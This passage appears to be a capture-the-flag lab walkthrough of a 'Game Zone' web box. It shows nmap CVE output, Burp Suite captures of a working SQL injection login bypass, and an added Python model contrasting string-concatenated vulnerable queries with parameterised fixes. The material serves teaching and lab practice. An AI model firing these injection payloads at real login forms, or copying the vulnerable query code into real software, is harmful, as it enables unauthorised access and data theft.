| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 5.0 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| CVE-2023-31122 5.0 https://vulners.com/cve/CVE-2023-31122
| CVE-2022-37436 5.0 https://vulners.com/cve/CVE-2022-37436
| CVE-2022-30556 5.0 https://vulners.com/cve/CVE-2022-30556
| CVE-2022-29404 5.0 https://vulners.com/cve/CVE-2022-29404
| CVE-2022-28614 5.0 https://vulners.com/cve/CVE-2022-28614
| CVE-2022-26377 5.0 https://vulners.com/cve/CVE-2022-26377
| CVE-2022-22719 5.0 https://vulners.com/cve/CVE-2022-22719
| CVE-2021-34798 5.0 https://vulners.com/cve/CVE-2021-34798
| CVE-2021-33193 5.0 https://vulners.com/cve/CVE-2021-33193
| CVE-2021-26690 5.0 https://vulners.com/cve/CVE-2021-26690
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-17567 5.0 https://vulners.com/cve/CVE-2019-17567
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17189 5.0 https://vulners.com/cve/CVE-2018-17189
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1303 5.0 https://vulners.com/cve/CVE-2018-1303
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740
| CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979
| CVE-2006-20001 5.0 https://vulners.com/cve/CVE-2006-20001
| CNVD-2023-93320 5.0 https://vulners.com/cnvd/CNVD-2023-93320
| CNVD-2023-80558 5.0 https://vulners.com/cnvd/CNVD-2023-80558
| CNVD-2022-73122 5.0 https://vulners.com/cnvd/CNVD-2022-73122
| CNVD-2022-53584 5.0 https://vulners.com/cnvd/CNVD-2022-53584
| CNVD-2022-53582 5.0 https://vulners.com/cnvd/CNVD-2022-53582
| CNVD-2022-03223 5.0 https://vulners.com/cnvd/CNVD-2022-03223
| C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B 5.0 https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 5.0 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 5.0 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A820A056-9F91-5059-B0BC-8D92C7A31A52 5.0 https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 5.0 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 5A864BCC-B490-5532-83AB-2E4109BB3C31 5.0 https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31 *EXPLOIT*
| 17C6AD2A-8469-56C8-BBBE-1764D0DF1680 5.0 https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680 *EXPLOIT*
| 1337DAY-ID-28573 5.0 https://vulners.com/zdt/1337DAY-ID-28573 *EXPLOIT*
| OSV:BIT-APACHE-2020-11993 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
| OSV:BIT-APACHE-2020-11985 4.3 https://vulners.com/osv/OSV:BIT-APACHE-2020-11985
| FF610CB4-801A-5D1D-9AC9-ADFC287C8482 4.3 https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482 *EXPLOIT*
| FDF4BBB1-979C-5320-95EA-9EC7EB064D72 4.3 https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72 *EXPLOIT*
| FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 4.3 https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46 *EXPLOIT*
| EDB-ID:50383 4.3 https://vulners.com/exploitdb/EDB-ID:50383 *EXPLOIT*
| E7B177F6-FA62-52FE-A108-4B8FC8112B7F 4.3 https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F *EXPLOIT*
| E6B39247-8016-5007-B505-699F05FCA1B5 4.3 https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5 *EXPLOIT*
| DBF996C3-DC2A-5859-B767-6B2FC38F2185 4.3 https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185 *EXPLOIT*
| D0E79214-C9E8-52BD-BC24-093970F5F34E 4.3 https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E *EXPLOIT*
| CVE-2020-11985 4.3 https://vulners.com/cve/CVE-2020-11985
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-1302 4.3 https://vulners.com/cve/CVE-2018-1302
| CVE-2018-1301 4.3 https://vulners.com/cve/CVE-2018-1301
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546
| CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE 4.3 https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE *EXPLOIT*
| CD48BD40-E52A-5A8B-AE27-B57C358BB0EE 4.3 https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE *EXPLOIT*
| C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 4.3 https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79 *EXPLOIT*
| C8799CA3-C88C-5B39-B291-2895BE0D9133 4.3 https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133 *EXPLOIT*
| C0380E16-C468-5540-A427-7FE34E7CF36B 4.3 https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B *EXPLOIT*
| BC027F41-02AD-5D71-A452-4DD62B0F1EE1 4.3 https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1 *EXPLOIT*
| B946B2A1-2914-537A-BF26-94B48FC501B3 4.3 https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3 *EXPLOIT*
| B9151905-5395-5622-B789-E16B88F30C71 4.3 https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71 *EXPLOIT*
| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 749F952B-3ACF-56B2-809D-D66E756BE839 4.3 https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 4013EC74-B3C1-5D95-938A-54197A58586D 4.3 https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1337DAY-ID-33575 4.3 https://vulners.com/zdt/1337DAY-ID-33575 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_ PACKETSTORM:152441 0.0 https://vulners.com/packetstorm/PACKETSTORM:152441 *EXPLOIT*
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=ip-10-10-125-35.eu-west-1.compute.internal
| Found the following possible CSRF vulnerabilities:
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/
| Form id: field_username
| Form action: index.php
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/
| Form id:
| Form action: #
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/index.php
| Form id: field_username
| Form action: index.php
|
| Path: http://ip-10-10-125-35.eu-west-1.compute.internal:80/index.php
| Form id:
|_ Form action: #
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 02:9D:BB:4A:83:77 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 330.48 seconds
-------------- BURPSUITE
WE ANALYSE THE LOGIN REQUESTS WITH BURPSUITE TO GET AN OVERVIEW OF THE QUERIES AND THE SERVER-SIDE RESPONSE:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=P4IM0N&password=12345&x=27&y=5
WE KEEP TESTING IN BURPSUITE WITH AN ARBITRARY USERNAME AND A BASIC INJECTION IN THE PASSWORD FIELD:
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=P4IM0N&password=' or 1=1 -- -&x=27&y=5
RESPONSE:
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:25:53 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4517
Connection: close
Content-Type: text/html; charset=UTF-8
Incorrect login
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
.................
WE TRY AGAIN IN BURPSUITE WITH AN ARBITRARY USERNAME, THIS TIME WITH THE BASIC INJECTION IN THE USERNAME FIELD, AND BINGO: IT LET US IN WITH OUR ARBITRARY USER AND REDIRECTED US:
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 41
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=' or 1=1 -- -&password=&x=27&y=5
RESPONSE:
HTTP/1.1 302 Found
Date: Tue, 30 Jan 2024 23:28:08 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: portal.php
Content-Length: 4502
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:30:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 726
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
</table>
</div>
</body>
</html>
NOW WE TRY THE SAME THING WITH A PLAUSIBLE VALID USER SUCH AS ADMIN AND SEE WHAT HAPPENS:
REQUEST:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin&password=%27+or+1%3D1+--+-&x=23&y=7
WE TRY IT ON THE USER FIELD:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin%27+or+1%3D1+--+-&password=12324&x=14&y=8
GET /portal.php HTTP/1.1
Host: 10.10.125.35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
BINGO, IT WORKED. WE TRY AGAIN WITH BURPSUITE'S REPEATER AND GET INTO A PANEL WITH A MOVIE SEARCH:
REQUEST AND REDIRECT:
POST /index.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
username=admin' or 1=1 -- -&password=1234&x=23&y=7
GET /portal.php HTTP/1.1
Host: 10.10.125.35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
RESPONSE AND A REDIRECT TO THE PANEL:
HTTP/1.1 302 Found
Date: Tue, 30 Jan 2024 23:39:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: portal.php
Content-Length: 4502
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1
..............
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:39:24 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 726
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
</table>
</div>
</body>
</html>
AND WE WERE ABLE TO LOOK UP INFO ON A MOVIE IN THE WEB PANEL:
Game Zone Portal
Search for a game review:
Title Review
Hitman 2 Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.
WE INTERCEPT THE SEARCH FUNCTION'S REQUESTS TO SEE HOW THE REQUEST AND RESPONSE WORK:
REQUEST:
POST /portal.php HTTP/1.1
Host: 10.10.125.35
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.125.35
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.125.35/portal.php
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8
Cookie: PHPSESSID=dhih54edbckjubvee8l2p7je23
Connection: close
searchitem=hitman
RESPONSE:
HTTP/1.1 200 OK
Date: Tue, 30 Jan 2024 23:50:35 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 953
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>Game Zone Portal</title>
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
</head>
<body>
<center>
<h1>Game Zone Portal</h1><br />
<table class="response">
<form method="POST" autocomplete="off">
<tr>
<td>
Search for a game review:
</td>
<td>
<input type="text" id="searchitem" name="searchitem">
</td>
<td>
<input type="submit" value="Search!"/>
</td>
</tr>
</table>
</p>
</form>
<div class="searchheader" style="color:white">
<table>
<tr>
<td style="width:200px">
<b>Title</b>
</td>
<td style="width:450px">
<b>Review</b>
</td>
</tr>
<tr><td style="width:200px">Hitman 2</td><td style="width:450px">Hitman 2 doesnt add much of note to the structure of its predecessor and thus feels more like Hitman 1.5 than a full-blown sequel. But thats not a bad thing.</td></table>
</div>
</body>
</html>
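Added example, not code from the original writeup: an offline sqlite3 model of the login and search queries intercepted above. It shows why `' or 1=1 -- -` in the username field logs in, why the same payload in the password field returned "Incorrect login", what the boolean-based blind condition sqlmap reports on `searchitem` looks like, and the parameterised form that closes both holes. The real index.php/portal.php source is not on the page; the query shapes, and the assumption that the password is SHA-256-hashed before it reaches the query, are mine, chosen to reproduce the observed behaviour.

```python
"""
Added example (not from the original writeup): an offline model of the Game Zone
login and search queries on sqlite3. The real PHP source is not on the page, so the
query shapes below are assumptions chosen to reproduce the observed behaviour.
"""
import hashlib
import sqlite3

# Constructed sample rows mirroring the dumped db.users and db.post tables.
USERS = [("agent47", hashlib.sha256(b"videogamer124").hexdigest())]
POSTS = [
    (3, "SWBF2 2005", "Best game ever"),
    (4, "Hitman 2", "Hitman 2 doesnt add much of note to the structure of its predecessor."),
]


def make_db():
    """In-memory database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute("CREATE TABLE post (id INTEGER, name TEXT, description TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.executemany("INSERT INTO post VALUES (?, ?, ?)", POSTS)
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated login query (assumed shape of index.php).

    The password is hashed before it reaches the query, so a payload in the
    password field is neutralised (matches the 'Incorrect login' seen above),
    while the raw username lands inside the quotes and '-- -' comments out
    the rest of the WHERE clause.
    """
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pwd = '{pwd_hash}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: user input can never become SQL syntax.
    Unsalted SHA-256 is kept only to mirror the dump; real code needs a salted KDF."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, term):
    """Concatenated LIKE search (assumed shape of portal.php; 3 columns as sqlmap found).

    A term such as "hitman%' AND 1=2 -- -" changes the result set, which is the
    boolean-based blind condition sqlmap reported for 'searchitem'.
    """
    sql = f"SELECT id, name, description FROM post WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Parameterised LIKE: the whole term is data. Note that '%' and '_' inside
    the term still act as LIKE wildcards; escape them if exact matching matters."""
    return conn.execute(
        "SELECT id, name, description FROM post WHERE name LIKE ?",
        ("%" + term + "%",),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' or 1=1 -- -", ""))        # agent47 (bypass)
    print(login_vulnerable(db, "P4IM0N", "' or 1=1 -- -"))  # None (hashed first)
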